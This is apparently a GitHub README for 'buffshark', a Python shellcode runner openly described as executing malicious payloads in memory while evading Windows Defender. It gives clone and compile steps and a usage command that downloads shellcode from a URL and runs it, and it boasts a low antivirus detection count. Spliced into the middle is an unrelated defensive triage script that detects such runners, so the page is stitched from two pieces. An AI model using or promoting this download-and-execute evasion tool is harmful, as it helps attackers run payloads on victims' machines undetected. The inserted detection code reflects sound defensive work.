Shellcode runner to execute malicious payload and bypass AV

Overview

buffshark-shellcode-runner

Python Shellcode Runner to execute malicious payload and bypass AV

This script uses mmap (on Linux) and Windows API wrappers (on Windows) to execute shellcode in memory and bypass Windows Defender.
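A static triage check for the trait combination described above (a URL fetch together with executable memory obtained through mmap or ctypes Windows API calls), added here as an example and not part of buffshark. The module and API name sets, the `triage` function and the sample sources are constructed assumptions; the README does not say which Windows API calls the script wraps.

```python
import ast

# Assumed indicator sets: the README names only "mmap" and "win api wrappers".
FETCH_MODULES = {"urllib", "requests", "http", "socket"}
WIN_EXEC_APIS = {"VirtualAlloc", "VirtualProtect", "RtlMoveMemory", "CreateThread"}


def triage(source: str) -> dict:
    """Parse (never execute) Python source and report in-memory-execution traits."""
    imports, names = set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            imports.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module.split(".")[0])
            names.update(a.name for a in node.names)
        elif isinstance(node, ast.Attribute):
            names.add(node.attr)
        elif isinstance(node, ast.Name):
            names.add(node.id)
    found = {
        "fetch": bool(imports & FETCH_MODULES),
        # Anonymous or file mapping requested with execute permission (POSIX).
        "exec_mmap": "mmap" in imports and "PROT_EXEC" in names,
        # ctypes reaching for allocate/copy/run primitives (Windows).
        "win_api": "ctypes" in imports and bool(names & WIN_EXEC_APIS),
    }
    found["suspicious"] = found["fetch"] and (found["exec_mmap"] or found["win_api"])
    return found


# Constructed inputs: trait-only fragments, not working programs.
SAMPLE_NIX = """
import mmap
import urllib.request
buf = mmap.mmap(-1, 4096, prot=mmap.PROT_READ | mmap.PROT_EXEC)
"""
SAMPLE_WIN = """
import ctypes, requests
k32 = ctypes.windll.kernel32
alloc, run = k32.VirtualAlloc, k32.CreateThread
"""
SAMPLE_BENIGN = """
import mmap, requests
view = mmap.mmap(open("data.bin", "rb").fileno(), 0, access=mmap.ACCESS_READ)
"""

if __name__ == "__main__":
    for label, src in [("nix", SAMPLE_NIX), ("win", SAMPLE_WIN), ("benign", SAMPLE_BENIGN)]:
        print(label, triage(src))
```

A PyInstaller bundle has to be unpacked back to source or bytecode before a check like this applies, and a hit is a triage signal for review rather than proof of malice.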

Installation and Compiling

  1. Download the repo: git clone https://github.com/momo1239/buffshark-shellcode-runner
  2. Move directory: cd buffshark-shellcode-runner/

     └─# python3 buffshark.py -h
     ==========================
     Buff Shark Shellcode Runner
      Author: Momo Nguyen 
     ==========================
     usage: buffshark.py [-h] -u  -a

     Python Shellcode Runner

     optional arguments:
       -h, --help            show this help message and exit
       -u , --url            URL to raw shellcode file
       -a , --architecture   Choose OS

  3. Optional: Install pyinstaller to compile to a Windows executable: pip install pyinstaller
  4. Optional: Compile: pyinstaller -F buffshark.py

Usage

Example: python3 buffshark.py -u http://127.0.0.1:8080/shellcode.bin -a [win/nix]

==========================
Buff Shark Shellcode Runner
 Author: Momo Nguyen 
==========================
[+] Downloading shellcode...
[+] 49 Bytes Downloaded!
[+] Running shellcode in memory...
README.md  antiscan.PNG  antiscanres.PNG  buffshark.exe  buffshark.py  shell.bin  shellcode

AV Scan

As of 11/22/2021, Windows Defender does not flag this shellcode runner.

1 of 26 AV engines on antiscan.me has flagged buffshark.


Owner
Momo Lenard